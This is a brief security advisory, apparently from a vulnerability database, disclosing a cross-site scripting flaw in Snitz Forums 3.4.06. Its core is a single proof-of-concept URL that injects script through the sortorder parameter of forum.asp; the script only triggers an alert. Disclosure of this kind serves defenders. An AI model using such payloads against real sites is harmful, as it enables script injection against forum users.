Snitz Forums 2000 v3.4.06

2006-09-14T00:00:00
ID SECURITYVULNS:DOC:14270
Type securityvulns
Reporter Securityvulns
Modified 2006-09-14T00:00:00

Description

ENGLISH

Title : Snitz Forums 3.4.06 XSS Vulnerability

Author : ajann

HomePage : http://forum.snitz.com

[CODE]

http://target.com/[path]/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=lastpost&sortorder="><script>function%20xssbaslat(){alert("Xss%20Here");}</script><body%20onload="xssbaslat()">

etc..